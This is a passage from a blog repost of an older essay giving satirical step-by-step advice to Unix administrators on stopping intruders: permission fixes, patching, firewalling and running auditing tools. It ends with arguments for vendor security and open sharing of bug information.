administrators and friends and even some trusted mailing lists, Usenet
groups, etc. (Make sure no one who is NOT in the inner circle of security
gets this.)
This is broken down on How to Become an UeberAdmin (otherwise know as a
security expert) and How to stop Uebercrackers.
Step 1. Read Unix manual ( a good idea for admins ).
Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install
sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers
now. Rdist scripts is among the favorites for getting root by
uebercrackers.
Step 3. Okay, maybe you want to actually secure your machine from the
elite Uebercrackers who can break into any site on Internet.
Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
packets. (This only applies to advanced admins who have control of the
router, but this will stop 90% of all uebercrackers from attempting your
site.)
Step 5. Apply all CERT and vendor patches to all of your machines. You have
just now killed 95% of all uebercrackers.
Step 6. Run a good password cracker to find open accounts and close them.
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
to find if a uebercracker is knocking on your machines. Run ISS to make
sure that all your machines are reasonably secure as far as remote
configuration (ie. your NFS exports and anon FTP site.)
Step 7. If you have done all of the following, you will have stopped 99%
of all uebercrackers. Congrads! (Remember, You are the admin.)
Step 8. Now there is one percent of uebercrackers that have gained
knowledge from reading some security expert's mail (probably gained access
to his mail via NFS exports or the guest account. You know how it is, like
the mechanic that always has a broken car, or the plumber that has the
broken sink, the security expert usually has an open machine.)
Step 9. Here is the hard part is to try to convince these security experts
that they are not so above the average citizen and that by now giving out
their unknown (except for the uebercrackers) security bugs, it would be a
service to Internet. They do not have to post it on Usenet, but share
among many other trusted people and hopefully fixes will come about and
new pressure will be applied to vendors to come out with patches.
Step 10. If you have gained the confidence of enough security experts,
you will know be a looked upto as an elite security administrator that is
able to stop most uebercrackers. The final true test for being a ueberadmin
is to compile a IRC client, go onto #hack and log all the bragging and
help catch the uebercrackers. If a uebercracker does get into your system,
and he has used a new method you have never seen, you can probably tell
your other security admins and get half of the replies like - "That bug
been known for years, there just isn't any patches for it yet. Here's my
fix." and the other half of the replies will be like - "Wow. That is very
impressive. You have just moved up a big notch in my security circle."
VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups
mention anything about that security hole, Flame him for discussing it
since it could bring down Internet and all Uebercrackers will now have it
and the million other reasons to keep everything secret about security.
Well, this paper has shown the finer details of security on Internet. It has
shown both sides of the coin. Three points I would like to make that would
probably clean up most of the security problems on Internet are as the
following:
1. Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs
that have been floating around since the Internet Worm (6 years ago) fixed
and patched, then most uebercrackers would be stuck as new machines get
added to Internet. (I believe Uebercracker is german for "lame copy-cat
that can get root with 3 year old bugs.") An interesting note is that
if you probably check the mail alias for "security@vendor.com", you will
find it points to /dev/null. Maybe with enough mail, it will overfill
/dev/null. (Look in manual if confused.)
2. Security experts giving up the attitude that they are above the normal
Internet user and try to give out information that could lead to pressure
by other admins to vendors to come out with fixes and patches. Most
security experts probably don't realize how far their information has
already spread.
3. And probably one of the more important points is just following the
steps I have outlined for Stopping a Uebercracker.
Posted by ekansh at 1:11 AM 0 comments
